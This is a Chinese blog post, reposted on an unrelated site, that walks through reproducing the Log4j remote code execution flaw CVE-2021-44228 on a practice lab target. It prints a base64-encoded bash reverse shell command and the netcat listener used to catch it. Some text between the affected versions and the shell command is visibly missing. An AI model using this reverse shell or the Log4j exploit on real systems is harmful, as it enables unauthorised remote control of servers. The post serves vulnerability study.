[漏洞复现]log4j漏洞RCE(CVE |
您所在的位置:网站首页 › 漏洞复现平台有哪些类型 › [漏洞复现]log4j漏洞RCE(CVE |
前言 2021/12/09,阿里云安全团队向apache报告了由log4j日志引起的远程代码执行,12月10日,当天白帽跟提前过大年似的,疯狂刷src(利用超级简单),让部分src平台暂时停止收类似该漏洞,凌晨,很多程序员和安全员被迫起来应急响应,几乎市面上的大厂都受到了该漏洞的影响 ![]() 这里做一个复现学习的小文章,由于对java这方面的知识雀食是薄弱,而且本地复现时,出现了挺多问题,在本地复现时,不知道是什么原因,利用payload去打的时候,总是说loggxxx模块不存在...idea也犯毛病...果断直接用网上的靶机去复现一波 1.漏洞信息漏洞信息 漏洞名称 Apche log4j远程代码执行漏洞 漏洞编码 CVE-2021-44228 漏洞危害 严重 漏洞时间 2021/12/10 受影响版本 Apache Log4j 2.x &1 ---> YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNjY2NiAwPiYx 另起终端,打开nc -lvp 端口 进行监听 ![]() vulfocus的靶机,用类似下面这个payload ![]() ![]() ![]() ![]() 注意,2021/12/10 360漏洞云发布二次通告预警,官方发布的修复rc1版本仍然可以绕过,请使用该版本的的用户尽快升级至rc2 7.注意的点所有漏洞复现文章仅供学习交流使用,禁止用于非法用途!!!!!!!!!!!!!!!!!! |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |